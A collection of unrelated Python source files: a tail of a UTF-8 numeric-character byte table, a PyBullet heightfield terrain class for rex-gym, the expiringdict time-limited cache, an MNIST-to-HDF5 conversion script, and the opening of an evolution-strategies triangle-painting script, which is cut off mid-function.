[ 240, 144, 185, 170 ],
[ 240, 144, 185, 171 ],
[ 240, 144, 185, 172 ],
[ 240, 144, 185, 173 ],
[ 240, 144, 185, 174 ],
[ 240, 144, 185, 175 ],
[ 240, 144, 185, 176 ],
[ 240, 144, 185, 177 ],
[ 240, 144, 185, 178 ],
[ 240, 144, 185, 179 ],
[ 240, 144, 185, 180 ],
[ 240, 144, 185, 181 ],
[ 240, 144, 185, 182 ],
[ 240, 144, 185, 183 ],
[ 240, 144, 185, 184 ],
[ 240, 144, 185, 185 ],
[ 240, 144, 185, 186 ],
[ 240, 144, 185, 187 ],
[ 240, 144, 185, 188 ],
[ 240, 144, 185, 189 ],
[ 240, 144, 185, 190 ],
[ 240, 145, 129, 146 ],
[ 240, 145, 129, 147 ],
[ 240, 145, 129, 148 ],
[ 240, 145, 129, 149 ],
[ 240, 145, 129, 150 ],
[ 240, 145, 129, 151 ],
[ 240, 145, 129, 152 ],
[ 240, 145, 129, 153 ],
[ 240, 145, 129, 154 ],
[ 240, 145, 129, 155 ],
[ 240, 145, 129, 156 ],
[ 240, 145, 129, 157 ],
[ 240, 145, 129, 158 ],
[ 240, 145, 129, 159 ],
[ 240, 145, 129, 160 ],
[ 240, 145, 129, 161 ],
[ 240, 145, 129, 162 ],
[ 240, 145, 129, 163 ],
[ 240, 145, 129, 164 ],
[ 240, 145, 129, 165 ],
[ 240, 145, 129, 166 ],
[ 240, 145, 129, 167 ],
[ 240, 145, 129, 168 ],
[ 240, 145, 129, 169 ],
[ 240, 145, 129, 170 ],
[ 240, 145, 129, 171 ],
[ 240, 145, 129, 172 ],
[ 240, 145, 129, 173 ],
[ 240, 145, 129, 174 ],
[ 240, 145, 129, 175 ],
[ 240, 145, 131, 176 ],
[ 240, 145, 131, 177 ],
[ 240, 145, 131, 178 ],
[ 240, 145, 131, 179 ],
[ 240, 145, 131, 180 ],
[ 240, 145, 131, 181 ],
[ 240, 145, 131, 182 ],
[ 240, 145, 131, 183 ],
[ 240, 145, 131, 184 ],
[ 240, 145, 131, 185 ],
[ 240, 145, 132, 182 ],
[ 240, 145, 132, 183 ],
[ 240, 145, 132, 184 ],
[ 240, 145, 132, 185 ],
[ 240, 145, 132, 186 ],
[ 240, 145, 132, 187 ],
[ 240, 145, 132, 188 ],
[ 240, 145, 132, 189 ],
[ 240, 145, 132, 190 ],
[ 240, 145, 132, 191 ],
[ 240, 145, 135, 144 ],
[ 240, 145, 135, 145 ],
[ 240, 145, 135, 146 ],
[ 240, 145, 135, 147 ],
[ 240, 145, 135, 148 ],
[ 240, 145, 135, 149 ],
[ 240, 145, 135, 150 ],
[ 240, 145, 135, 151 ],
[ 240, 145, 135, 152 ],
[ 240, 145, 135, 153 ],
[ 240, 145, 135, 161 ],
[ 240, 145, 135, 162 ],
[ 240, 145, 135, 163 ],
[ 240, 145, 135, 164 ],
[ 240, 145, 135, 165 ],
[ 240, 145, 135, 166 ],
[ 240, 145, 135, 167 ],
[ 240, 145, 135, 168 ],
[ 240, 145, 135, 169 ],
[ 240, 145, 135, 170 ],
[ 240, 145, 135, 171 ],
[ 240, 145, 135, 172 ],
[ 240, 145, 135, 173 ],
[ 240, 145, 135, 174 ],
[ 240, 145, 135, 175 ],
[ 240, 145, 135, 176 ],
[ 240, 145, 135, 177 ],
[ 240, 145, 135, 178 ],
[ 240, 145, 135, 179 ],
[ 240, 145, 135, 180 ],
[ 240, 145, 139, 176 ],
[ 240, 145, 139, 177 ],
[ 240, 145, 139, 178 ],
[ 240, 145, 139, 179 ],
[ 240, 145, 139, 180 ],
[ 240, 145, 139, 181 ],
[ 240, 145, 139, 182 ],
[ 240, 145, 139, 183 ],
[ 240, 145, 139, 184 ],
[ 240, 145, 139, 185 ],
[ 240, 145, 147, 144 ],
[ 240, 145, 147, 145 ],
[ 240, 145, 147, 146 ],
[ 240, 145, 147, 147 ],
[ 240, 145, 147, 148 ],
[ 240, 145, 147, 149 ],
[ 240, 145, 147, 150 ],
[ 240, 145, 147, 151 ],
[ 240, 145, 147, 152 ],
[ 240, 145, 147, 153 ],
[ 240, 145, 153, 144 ],
[ 240, 145, 153, 145 ],
[ 240, 145, 153, 146 ],
[ 240, 145, 153, 147 ],
[ 240, 145, 153, 148 ],
[ 240, 145, 153, 149 ],
[ 240, 145, 153, 150 ],
[ 240, 145, 153, 151 ],
[ 240, 145, 153, 152 ],
[ 240, 145, 153, 153 ],
[ 240, 145, 155, 128 ],
[ 240, 145, 155, 129 ],
[ 240, 145, 155, 130 ],
[ 240, 145, 155, 131 ],
[ 240, 145, 155, 132 ],
[ 240, 145, 155, 133 ],
[ 240, 145, 155, 134 ],
[ 240, 145, 155, 135 ],
[ 240, 145, 155, 136 ],
[ 240, 145, 155, 137 ],
[ 240, 145, 156, 176 ],
[ 240, 145, 156, 177 ],
[ 240, 145, 156, 178 ],
[ 240, 145, 156, 179 ],
[ 240, 145, 156, 180 ],
[ 240, 145, 156, 181 ],
[ 240, 145, 156, 182 ],
[ 240, 145, 156, 183 ],
[ 240, 145, 156, 184 ],
[ 240, 145, 156, 185 ],
[ 240, 145, 156, 186 ],
[ 240, 145, 156, 187 ],
[ 240, 145, 163, 160 ],
[ 240, 145, 163, 161 ],
[ 240, 145, 163, 162 ],
[ 240, 145, 163, 163 ],
[ 240, 145, 163, 164 ],
[ 240, 145, 163, 165 ],
[ 240, 145, 163, 166 ],
[ 240, 145, 163, 167 ],
[ 240, 145, 163, 168 ],
[ 240, 145, 163, 169 ],
[ 240, 145, 163, 170 ],
[ 240, 145, 163, 171 ],
[ 240, 145, 163, 172 ],
[ 240, 145, 163, 173 ],
[ 240, 145, 163, 174 ],
[ 240, 145, 163, 175 ],
[ 240, 145, 163, 176 ],
[ 240, 145, 163, 177 ],
[ 240, 145, 163, 178 ],
[ 240, 146, 144, 128 ],
[ 240, 146, 144, 129 ],
[ 240, 146, 144, 130 ],
[ 240, 146, 144, 131 ],
[ 240, 146, 144, 132 ],
[ 240, 146, 144, 133 ],
[ 240, 146, 144, 134 ],
[ 240, 146, 144, 135 ],
[ 240, 146, 144, 136 ],
[ 240, 146, 144, 137 ],
[ 240, 146, 144, 138 ],
[ 240, 146, 144, 139 ],
[ 240, 146, 144, 140 ],
[ 240, 146, 144, 141 ],
[ 240, 146, 144, 142 ],
[ 240, 146, 144, 143 ],
[ 240, 146, 144, 144 ],
[ 240, 146, 144, 145 ],
[ 240, 146, 144, 146 ],
[ 240, 146, 144, 147 ],
[ 240, 146, 144, 148 ],
[ 240, 146, 144, 149 ],
[ 240, 146, 144, 150 ],
[ 240, 146, 144, 151 ],
[ 240, 146, 144, 152 ],
[ 240, 146, 144, 153 ],
[ 240, 146, 144, 154 ],
[ 240, 146, 144, 155 ],
[ 240, 146, 144, 156 ],
[ 240, 146, 144, 157 ],
[ 240, 146, 144, 158 ],
[ 240, 146, 144, 159 ],
[ 240, 146, 144, 160 ],
[ 240, 146, 144, 161 ],
[ 240, 146, 144, 162 ],
[ 240, 146, 144, 163 ],
[ 240, 146, 144, 164 ],
[ 240, 146, 144, 165 ],
[ 240, 146, 144, 166 ],
[ 240, 146, 144, 167 ],
[ 240, 146, 144, 168 ],
[ 240, 146, 144, 169 ],
[ 240, 146, 144, 170 ],
[ 240, 146, 144, 171 ],
[ 240, 146, 144, 172 ],
[ 240, 146, 144, 173 ],
[ 240, 146, 144, 174 ],
[ 240, 146, 144, 175 ],
[ 240, 146, 144, 176 ],
[ 240, 146, 144, 177 ],
[ 240, 146, 144, 178 ],
[ 240, 146, 144, 179 ],
[ 240, 146, 144, 180 ],
[ 240, 146, 144, 181 ],
[ 240, 146, 144, 182 ],
[ 240, 146, 144, 183 ],
[ 240, 146, 144, 184 ],
[ 240, 146, 144, 185 ],
[ 240, 146, 144, 186 ],
[ 240, 146, 144, 187 ],
[ 240, 146, 144, 188 ],
[ 240, 146, 144, 189 ],
[ 240, 146, 144, 190 ],
[ 240, 146, 144, 191 ],
[ 240, 146, 145, 128 ],
[ 240, 146, 145, 129 ],
[ 240, 146, 145, 130 ],
[ 240, 146, 145, 131 ],
[ 240, 146, 145, 132 ],
[ 240, 146, 145, 133 ],
[ 240, 146, 145, 134 ],
[ 240, 146, 145, 135 ],
[ 240, 146, 145, 136 ],
[ 240, 146, 145, 137 ],
[ 240, 146, 145, 138 ],
[ 240, 146, 145, 139 ],
[ 240, 146, 145, 140 ],
[ 240, 146, 145, 141 ],
[ 240, 146, 145, 142 ],
[ 240, 146, 145, 143 ],
[ 240, 146, 145, 144 ],
[ 240, 146, 145, 145 ],
[ 240, 146, 145, 146 ],
[ 240, 146, 145, 147 ],
[ 240, 146, 145, 148 ],
[ 240, 146, 145, 149 ],
[ 240, 146, 145, 150 ],
[ 240, 146, 145, 151 ],
[ 240, 146, 145, 152 ],
[ 240, 146, 145, 153 ],
[ 240, 146, 145, 154 ],
[ 240, 146, 145, 155 ],
[ 240, 146, 145, 156 ],
[ 240, 146, 145, 157 ],
[ 240, 146, 145, 158 ],
[ 240, 146, 145, 159 ],
[ 240, 146, 145, 160 ],
[ 240, 146, 145, 161 ],
[ 240, 146, 145, 162 ],
[ 240, 146, 145, 163 ],
[ 240, 146, 145, 164 ],
[ 240, 146, 145, 165 ],
[ 240, 146, 145, 166 ],
[ 240, 146, 145, 167 ],
[ 240, 146, 145, 168 ],
[ 240, 146, 145, 169 ],
[ 240, 146, 145, 170 ],
[ 240, 146, 145, 171 ],
[ 240, 146, 145, 172 ],
[ 240, 146, 145, 173 ],
[ 240, 146, 145, 174 ],
[ 240, 150, 169, 160 ],
[ 240, 150, 169, 161 ],
[ 240, 150, 169, 162 ],
[ 240, 150, 169, 163 ],
[ 240, 150, 169, 164 ],
[ 240, 150, 169, 165 ],
[ 240, 150, 169, 166 ],
[ 240, 150, 169, 167 ],
[ 240, 150, 169, 168 ],
[ 240, 150, 169, 169 ],
[ 240, 150, 173, 144 ],
[ 240, 150, 173, 145 ],
[ 240, 150, 173, 146 ],
[ 240, 150, 173, 147 ],
[ 240, 150, 173, 148 ],
[ 240, 150, 173, 149 ],
[ 240, 150, 173, 150 ],
[ 240, 150, 173, 151 ],
[ 240, 150, 173, 152 ],
[ 240, 150, 173, 153 ],
[ 240, 150, 173, 155 ],
[ 240, 150, 173, 156 ],
[ 240, 150, 173, 157 ],
[ 240, 150, 173, 158 ],
[ 240, 150, 173, 159 ],
[ 240, 150, 173, 160 ],
[ 240, 150, 173, 161 ],
[ 240, 157, 141, 160 ],
[ 240, 157, 141, 161 ],
[ 240, 157, 141, 162 ],
[ 240, 157, 141, 163 ],
[ 240, 157, 141, 164 ],
[ 240, 157, 141, 165 ],
[ 240, 157, 141, 166 ],
[ 240, 157, 141, 167 ],
[ 240, 157, 141, 168 ],
[ 240, 157, 141, 169 ],
[ 240, 157, 141, 170 ],
[ 240, 157, 141, 171 ],
[ 240, 157, 141, 172 ],
[ 240, 157, 141, 173 ],
[ 240, 157, 141, 174 ],
[ 240, 157, 141, 175 ],
[ 240, 157, 141, 176 ],
[ 240, 157, 141, 177 ],
[ 240, 157, 159, 142 ],
[ 240, 157, 159, 143 ],
[ 240, 157, 159, 144 ],
[ 240, 157, 159, 145 ],
[ 240, 157, 159, 146 ],
[ 240, 157, 159, 147 ],
[ 240, 157, 159, 148 ],
[ 240, 157, 159, 149 ],
[ 240, 157, 159, 150 ],
[ 240, 157, 159, 151 ],
[ 240, 157, 159, 152 ],
[ 240, 157, 159, 153 ],
[ 240, 157, 159, 154 ],
[ 240, 157, 159, 155 ],
[ 240, 157, 159, 156 ],
[ 240, 157, 159, 157 ],
[ 240, 157, 159, 158 ],
[ 240, 157, 159, 159 ],
[ 240, 157, 159, 160 ],
[ 240, 157, 159, 161 ],
[ 240, 157, 159, 162 ],
[ 240, 157, 159, 163 ],
[ 240, 157, 159, 164 ],
[ 240, 157, 159, 165 ],
[ 240, 157, 159, 166 ],
[ 240, 157, 159, 167 ],
[ 240, 157, 159, 168 ],
[ 240, 157, 159, 169 ],
[ 240, 157, 159, 170 ],
[ 240, 157, 159, 171 ],
[ 240, 157, 159, 172 ],
[ 240, 157, 159, 173 ],
[ 240, 157, 159, 174 ],
[ 240, 157, 159, 175 ],
[ 240, 157, 159, 176 ],
[ 240, 157, 159, 177 ],
[ 240, 157, 159, 178 ],
[ 240, 157, 159, 179 ],
[ 240, 157, 159, 180 ],
[ 240, 157, 159, 181 ],
[ 240, 157, 159, 182 ],
[ 240, 157, 159, 183 ],
[ 240, 157, 159, 184 ],
[ 240, 157, 159, 185 ],
[ 240, 157, 159, 186 ],
[ 240, 157, 159, 187 ],
[ 240, 157, 159, 188 ],
[ 240, 157, 159, 189 ],
[ 240, 157, 159, 190 ],
[ 240, 157, 159, 191 ],
[ 240, 158, 163, 135 ],
[ 240, 158, 163, 136 ],
[ 240, 158, 163, 137 ],
[ 240, 158, 163, 138 ],
[ 240, 158, 163, 139 ],
[ 240, 158, 163, 140 ],
[ 240, 158, 163, 141 ],
[ 240, 158, 163, 142 ],
[ 240, 158, 163, 143 ],
[ 240, 159, 132, 128 ],
[ 240, 159, 132, 129 ],
[ 240, 159, 132, 130 ],
[ 240, 159, 132, 131 ],
[ 240, 159, 132, 132 ],
[ 240, 159, 132, 133 ],
[ 240, 159, 132, 134 ],
[ 240, 159, 132, 135 ],
[ 240, 159, 132, 136 ],
[ 240, 159, 132, 137 ],
[ 240, 159, 132, 138 ],
[ 240, 159, 132, 139 ],
[ 240, 159, 132, 140 ] ]
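# Illustrative check (added; not part of the original file): each entry above is
# the UTF-8 byte sequence of a single numeric character (the ASCII digits first,
# then superscripts/fractions and digits from other scripts). Decoding a few
# entries makes that visible.
if __name__ == "__main__":
    for seq in uctable[:16]:
        print(seq, "->", bytes(seq).decode("utf-8"))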
|
rex_gym/model/terrain.py
|
y-prudent/rex-gym
| 827 |
75266
|
<reponame>y-prudent/rex-gym
# Original script: https://github.com/bulletphysics/bullet3/blob/master/examples/pybullet/examples/heightfield.py
import pybullet_data as pd
import rex_gym.util.pybullet_data as rpd
import pybullet as p
import random
from rex_gym.util import flag_mapper
FLAG_TO_FILENAME = {
'mounts': "heightmaps/wm_height_out.png",
'maze': "heightmaps/Maze.png"
}
ROBOT_INIT_POSITION = {
'mounts': [0, 0, .85],
'plane': [0, 0, 0.21],
'hills': [0, 0, 1.98],
'maze': [0, 0, 0.21],
'random': [0, 0, 0.21]
}
class Terrain:
def __init__(self, terrain_source, terrain_id, columns=256, rows=256):
random.seed(10)
self.terrain_source = terrain_source
self.terrain_id = terrain_id
self.columns = columns
self.rows = rows
def generate_terrain(self, env, height_perturbation_range=0.05):
env.pybullet_client.setAdditionalSearchPath(pd.getDataPath())
env.pybullet_client.configureDebugVisualizer(env.pybullet_client.COV_ENABLE_RENDERING, 0)
height_perturbation_range = height_perturbation_range
terrain_data = [0] * self.columns * self.rows
if self.terrain_source == 'random':
for j in range(int(self.columns / 2)):
for i in range(int(self.rows / 2)):
height = random.uniform(0, height_perturbation_range)
terrain_data[2 * i + 2 * j * self.rows] = height
terrain_data[2 * i + 1 + 2 * j * self.rows] = height
terrain_data[2 * i + (2 * j + 1) * self.rows] = height
terrain_data[2 * i + 1 + (2 * j + 1) * self.rows] = height
terrain_shape = env.pybullet_client.createCollisionShape(
shapeType=env.pybullet_client.GEOM_HEIGHTFIELD,
meshScale=[.05, .05, 1],
heightfieldTextureScaling=(self.rows - 1) / 2,
heightfieldData=terrain_data,
numHeightfieldRows=self.rows,
numHeightfieldColumns=self.columns)
terrain = env.pybullet_client.createMultiBody(0, terrain_shape)
env.pybullet_client.resetBasePositionAndOrientation(terrain, [0, 0, 0], [0, 0, 0, 1])
if self.terrain_source == 'csv':
terrain_shape = env.pybullet_client.createCollisionShape(
shapeType=env.pybullet_client.GEOM_HEIGHTFIELD,
meshScale=[.5, .5, .5],
fileName="heightmaps/ground0.txt",
heightfieldTextureScaling=128)
terrain = env.pybullet_client.createMultiBody(0, terrain_shape)
textureId = env.pybullet_client.loadTexture(f"{rpd.getDataPath()}/grass.png")
env.pybullet_client.changeVisualShape(terrain, -1, textureUniqueId=textureId)
env.pybullet_client.resetBasePositionAndOrientation(terrain, [1, 0, 2], [0, 0, 0, 1])
# TODO do this better..
if self.terrain_source == 'png':
terrain_shape = env.pybullet_client.createCollisionShape(
shapeType=env.pybullet_client.GEOM_HEIGHTFIELD,
meshScale=[.1, .1, 24 if self.terrain_id == "mounts" else 1],
fileName=FLAG_TO_FILENAME[self.terrain_id])
terrain = env.pybullet_client.createMultiBody(0, terrain_shape)
if self.terrain_id == "mounts":
textureId = env.pybullet_client.loadTexture("heightmaps/gimp_overlay_out.png")
env.pybullet_client.changeVisualShape(terrain, -1, textureUniqueId=textureId)
env.pybullet_client.resetBasePositionAndOrientation(terrain, [0, 0, 2], [0, 0, 0, 1])
else:
env.pybullet_client.resetBasePositionAndOrientation(terrain, [0, 0, 0], [0, 0, 0, 1])
self.terrain_shape = terrain_shape
env.pybullet_client.changeVisualShape(terrain, -1, rgbaColor=[1, 1, 1, 1])
# env.pybullet_client.configureDebugVisualizer(env.pybullet_client.COV_ENABLE_RENDERING, 1)
def update_terrain(self, height_perturbation_range=0.05):
if self.terrain_source == flag_mapper.TERRAIN_TYPE['random']:
terrain_data = [0] * self.columns * self.rows
for j in range(int(self.columns / 2)):
for i in range(int(self.rows / 2)):
height = random.uniform(0, height_perturbation_range)
terrain_data[2 * i + 2 * j * self.rows] = height
terrain_data[2 * i + 1 + 2 * j * self.rows] = height
terrain_data[2 * i + (2 * j + 1) * self.rows] = height
terrain_data[2 * i + 1 + (2 * j + 1) * self.rows] = height
# GEOM_CONCAVE_INTERNAL_EDGE may help avoid getting stuck at an internal (shared) edge of
# the triangle/heightfield. GEOM_CONCAVE_INTERNAL_EDGE is a bit slower to build though.
flags = p.GEOM_CONCAVE_INTERNAL_EDGE
# flags = 0
self.terrain_shape = p.createCollisionShape(
shapeType=p.GEOM_HEIGHTFIELD,
flags=flags,
meshScale=[.05, .05, 1],
heightfieldTextureScaling=(self.rows - 1) / 2,
heightfieldData=terrain_data,
numHeightfieldRows=self.rows,
numHeightfieldColumns=self.columns,
replaceHeightfieldIndex=self.terrain_shape)
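# Usage sketch (added for illustration; not part of the original file). Terrain
# only needs an env object exposing a `pybullet_client`, so this sketch takes
# the env as a parameter instead of reproducing rex_gym's environment setup.
# The 'random' source mirrors the string branch handled in generate_terrain.
def _terrain_usage_sketch(env, perturbation=0.05):
    terrain = Terrain(terrain_source='random', terrain_id='random', columns=256, rows=256)
    terrain.generate_terrain(env, height_perturbation_range=perturbation)
    return terrain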
|
expiringdict/__init__.py
|
jonnyyu/expiringdict
| 294 |
75274
|
<gh_stars>100-1000
"""
Dictionary with auto-expiring values for caching purposes.
Expiration happens on any access; the object is locked during cleanup of expired
values. It cannot store more than max_len elements - the oldest will be deleted.
>>> ExpiringDict(max_len=100, max_age_seconds=10)
The values are stored in the following way:
{
key1: (value1, created_time1),
key2: (value2, created_time2)
}
NOTE: iteration over dict and also keys() do not remove expired values!
"""
import time
from threading import RLock
import sys
from typing import Any, Union
try:
from collections import OrderedDict
except ImportError:
# Python < 2.7
from ordereddict import OrderedDict
class ExpiringDict(OrderedDict):
def __init__(self, max_len, max_age_seconds, items=None):
# type: (Union[int, None], Union[float, None], Union[None,dict,OrderedDict,ExpiringDict]) -> None
if not self.__is_instance_of_expiring_dict(items):
self.__assertions(max_len, max_age_seconds)
OrderedDict.__init__(self)
self.max_len = max_len
self.max_age = max_age_seconds
self.lock = RLock()
if sys.version_info >= (3, 5):
self._safe_keys = lambda: list(self.keys())
else:
self._safe_keys = self.keys
if items is not None:
if self.__is_instance_of_expiring_dict(items):
self.__copy_expiring_dict(max_len, max_age_seconds, items)
elif self.__is_instance_of_dict(items):
self.__copy_dict(items)
elif self.__is_reduced_result(items):
self.__copy_reduced_result(items)
else:
raise ValueError('can not unpack items')
def __contains__(self, key):
""" Return True if the dict has a key, else return False. """
try:
with self.lock:
item = OrderedDict.__getitem__(self, key)
if time.time() - item[1] < self.max_age:
return True
else:
del self[key]
except KeyError:
pass
return False
def __getitem__(self, key, with_age=False):
""" Return the item of the dict.
Raises a KeyError if key is not in the map.
"""
with self.lock:
item = OrderedDict.__getitem__(self, key)
item_age = time.time() - item[1]
if item_age < self.max_age:
if with_age:
return item[0], item_age
else:
return item[0]
else:
del self[key]
raise KeyError(key)
def __setitem__(self, key, value, set_time=None):
""" Set d[key] to value. """
with self.lock:
if len(self) == self.max_len:
if key in self:
del self[key]
else:
try:
self.popitem(last=False)
except KeyError:
pass
if set_time is None:
set_time = time.time()
OrderedDict.__setitem__(self, key, (value, set_time))
def pop(self, key, default=None):
""" Get item from the dict and remove it.
Return default if expired or does not exist. Never raise KeyError.
"""
with self.lock:
try:
item = OrderedDict.__getitem__(self, key)
del self[key]
return item[0]
except KeyError:
return default
def ttl(self, key):
""" Return TTL of the `key` (in seconds).
Returns None for non-existent or expired keys.
"""
key_value, key_age = self.get(key, with_age=True) # type: Any, Union[None, float]
if key_age:
key_ttl = self.max_age - key_age
if key_ttl > 0:
return key_ttl
return None
def get(self, key, default=None, with_age=False):
""" Return the value for key if key is in the dictionary, else default. """
try:
return self.__getitem__(key, with_age)
except KeyError:
if with_age:
return default, None
else:
return default
def items(self):
""" Return a copy of the dictionary's list of (key, value) pairs. """
r = []
for key in self._safe_keys():
try:
r.append((key, self[key]))
except KeyError:
pass
return r
def items_with_timestamp(self):
""" Return a copy of the dictionary's list of (key, value, timestamp) triples. """
r = []
for key in self._safe_keys():
try:
r.append((key, OrderedDict.__getitem__(self, key)))
except KeyError:
pass
return r
def values(self):
""" Return a copy of the dictionary's list of values.
See the note for dict.items(). """
r = []
for key in self._safe_keys():
try:
r.append(self[key])
except KeyError:
pass
return r
def fromkeys(self):
""" Create a new dictionary with keys from seq and values set to value. """
raise NotImplementedError()
def iteritems(self):
""" Return an iterator over the dictionary's (key, value) pairs. """
raise NotImplementedError()
def itervalues(self):
""" Return an iterator over the dictionary's values. """
raise NotImplementedError()
def viewitems(self):
""" Return a new view of the dictionary's items ((key, value) pairs). """
raise NotImplementedError()
def viewkeys(self):
""" Return a new view of the dictionary's keys. """
raise NotImplementedError()
def viewvalues(self):
""" Return a new view of the dictionary's values. """
raise NotImplementedError()
def __reduce__(self):
reduced = self.__class__, (self.max_len, self.max_age, ('reduce_result', self.items_with_timestamp()))
return reduced
def __assertions(self, max_len, max_age_seconds):
self.__assert_max_len(max_len)
self.__assert_max_age_seconds(max_age_seconds)
@staticmethod
def __assert_max_len(max_len):
assert max_len >= 1
@staticmethod
def __assert_max_age_seconds(max_age_seconds):
assert max_age_seconds >= 0
@staticmethod
def __is_reduced_result(items):
if len(items) == 2 and items[0] == 'reduce_result':
return True
return False
@staticmethod
def __is_instance_of_expiring_dict(items):
if items is not None:
if isinstance(items, ExpiringDict):
return True
return False
@staticmethod
def __is_instance_of_dict(items):
if isinstance(items, dict):
return True
return False
def __copy_expiring_dict(self, max_len, max_age_seconds, items):
# type: (Union[int, None], Union[float, None], Any) -> None
if max_len is not None:
self.__assert_max_len(max_len)
self.max_len = max_len
else:
self.max_len = items.max_len
if max_age_seconds is not None:
self.__assert_max_age_seconds(max_age_seconds)
self.max_age = max_age_seconds
else:
self.max_age = items.max_age
[self.__setitem__(key, value, set_time) for key, (value, set_time) in items.items_with_timestamp()]
def __copy_dict(self, items):
# type: (dict) -> None
[self.__setitem__(key, value) for key, value in items.items()]
def __copy_reduced_result(self, items):
[self.__setitem__(key, value, set_time) for key, (value, set_time) in items[1]]
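# Usage sketch (added; not part of the original file): the caching behavior of
# the class above -- the oldest entry is evicted once max_len is reached, and
# values disappear after max_age_seconds.
if __name__ == "__main__":
    cache = ExpiringDict(max_len=2, max_age_seconds=0.1)
    cache['a'] = 1
    cache['b'] = 2
    cache['c'] = 3                      # 'a' (the oldest) is evicted to keep max_len
    print('a' in cache)                 # False
    print(cache.get('b'), cache.ttl('c'))
    time.sleep(0.2)
    print(cache.get('c', 'expired'))    # 'expired' once max_age_seconds has passed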
|
mnist/mnist.py
|
Calysto/conx-data
| 105 |
75275
|
import h5py
import numpy as np
from keras.datasets import mnist
from keras.utils import to_categorical
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float16')
x_test = x_test.astype('float16')
inputs = np.concatenate((x_train,x_test)) / 255
labels = np.concatenate((y_train, y_test)) # ints, 0 to 9
###########################################
# fix mis-labeled image(s) in Keras dataset
labels[10994] = 9
###########################################
targets = to_categorical(labels).astype("uint8")
string = h5py.special_dtype(vlen=str)
labels = np.array([str(label) for label in labels], dtype=string)
print("creating h5...")
with h5py.File("mnist.h5", "w") as h5:
dset = h5.create_dataset('inputs', data=[inputs], compression='gzip', compression_opts=9)
dset = h5.create_dataset('targets', data=[targets], compression='gzip', compression_opts=9)
dset = h5.create_dataset('labels', data=[labels], compression='gzip', compression_opts=9)
print("done!")
|
es-clip/es_bitmap.py
|
daia99/brain-tokyo-workshop
| 1,097 |
75278
|
<filename>es-clip/es_bitmap.py
#!/usr/bin/env python3
import os
os.environ['OPENBLAS_NUM_THREADS'] = '1'
os.environ['OMP_NUM_THREADS'] = '1'
import argparse
import cProfile
import json
import multiprocessing as mp
import os
import re
import numpy as np
from PIL import Image
from pgpelib import PGPE
from utils import (img2arr, arr2img, rgba2rgb, save_as_png, EasyDict)
from painter import TrianglesPainter
from es import (get_tell_fn, get_best_params_fn, PrintStepHook, PrintCostHook, SaveCostHook, StoreImageHook, ShowImageHook)
def parse_cmd_args():
parser = argparse.ArgumentParser()
parser.add_argument('--out_dir', type=str, default='es_bitmap_out')
parser.add_argument('--height', type=int, default=200, help='Height of the canvas. -1 to infer from the target image.')
parser.add_argument('--width', type=int, default=-1, help='Width of the canvas. -1 to infer from the target image.')
parser.add_argument('--target_fn', type=str, required=True)
parser.add_argument('--n_triangle', type=int, default=50)
parser.add_argument('--loss_type', type=str, default='l2')
parser.add_argument('--alpha_scale', type=float, default=0.5)
parser.add_argument('--coordinate_scale', type=float, default=1.0)
parser.add_argument('--fps', type=int, default=12)
parser.add_argument('--n_population', type=int, default=256)
parser.add_argument('--n_iterations', type=int, default=10000)
parser.add_argument('--mp_batch_size', type=int, default=1)
parser.add_argument('--solver', type=str, default='pgpe', choices=['pgpe'])
parser.add_argument('--report_interval', type=int, default=50)
parser.add_argument('--step_report_interval', type=int, default=50)
parser.add_argument('--save_as_gif_interval', type=int, default=50)
parser.add_argument('--profile', type=bool, default=False)
cmd_args = parser.parse_args()
return cmd_args
def parse_args(cmd_args):
args = EasyDict()
args.out_dir = cmd_args.out_dir
args.height = cmd_args.height
args.width = cmd_args.width
args.target_fn = cmd_args.target_fn
args.n_triangle = cmd_args.n_triangle
args.loss_type = cmd_args.loss_type
args.alpha_scale = cmd_args.alpha_scale
args.coordinate_scale = cmd_args.coordinate_scale
args.fps = cmd_args.fps
args.n_population = cmd_args.n_population
args.n_iterations = cmd_args.n_iterations
args.mp_batch_size = cmd_args.mp_batch_size
args.solver = cmd_args.solver
args.report_interval = cmd_args.report_interval
args.step_report_interval = cmd_args.step_report_interval
args.save_as_gif_interval = cmd_args.save_as_gif_interval
args.profile = cmd_args.profile
return args
def pre_training_loop(args):
out_dir = args.out_dir
os.makedirs(out_dir, exist_ok=True)
assert os.path.isdir(out_dir)
prev_ids = [re.match(r'^\d+', fn) for fn in os.listdir(out_dir)]
new_id = 1 + max([-1] + [int(id_.group()) if id_ else -1 for id_ in prev_ids])
desc = f'{os.path.splitext(os.path.basename(args.target_fn))[0]}-' \
f'{args.n_triangle}-triangles-' \
f'{args.n_iterations}-iterations-' \
f'{args.n_population}-population-' \
f'{args.solver}-solver-' \
f'{args.loss_type}-loss'
args.working_dir = os.path.join(out_dir, f'{new_id:04d}-{desc}')
os.makedirs(args.working_dir)
args_dump_fn = os.path.join(args.working_dir, 'args.json')
with open(args_dump_fn, 'w') as f:
json.dump(args, f, indent=4)
def load_target(fn, resize):
img = Image.open(fn)
img = rgba2rgb(img)
h, w = resize
img = img.resize((w, h), Image.LANCZOS)
img_arr = img2arr(img)
return img_arr
def fitness_fn(params, painter, target_arr, loss_type):
NUM_ROLLOUTS = 5
losses = []
for _ in range(NUM_ROLLOUTS):
rendered_arr = painter.render(params)
rendered_arr_rgb = rendered_arr[..., :3]
rendered_arr_rgb = rendered_arr_rgb.astype(np.float32) / 255.
target_arr_rgb = target_arr[..., :3]
target_arr_rgb = target_arr_rgb.astype(np.float32) / 255.
if loss_type == 'l2':
pixelwise_l2_loss = (rendered_arr_rgb - target_arr_rgb)**2
l2_loss = pixelwise_l2_loss.mean()
loss = l2_loss
elif loss_type == 'l1':
pixelwise_l1_loss = np.abs(rendered_arr_rgb - target_arr_rgb)
l1_loss = pixelwise_l1_loss.mean()
loss = l1_loss
else:
raise ValueError(f'Unsupported loss type \'{loss_type}\'')
losses.append(loss)
return -np.mean(losses) # pgpe *maximizes*
worker_assets = None
def init_worker(painter, target_arr, loss_type):
global worker_assets
worker_assets = {'painter': painter, 'target_arr': target_arr, 'loss_type': loss_type}
def fitness_fn_by_worker(params):
global worker_assets
painter = worker_assets['painter']
target_arr = worker_assets['target_arr']
loss_type = worker_assets['loss_type']
return fitness_fn(params, painter, target_arr, loss_type)
def batch_fitness_fn_by_workers(params_batch):
return [fitness_fn_by_worker(params) for params in params_batch]
def infer_height_and_width(hint_height, hint_width, fn):
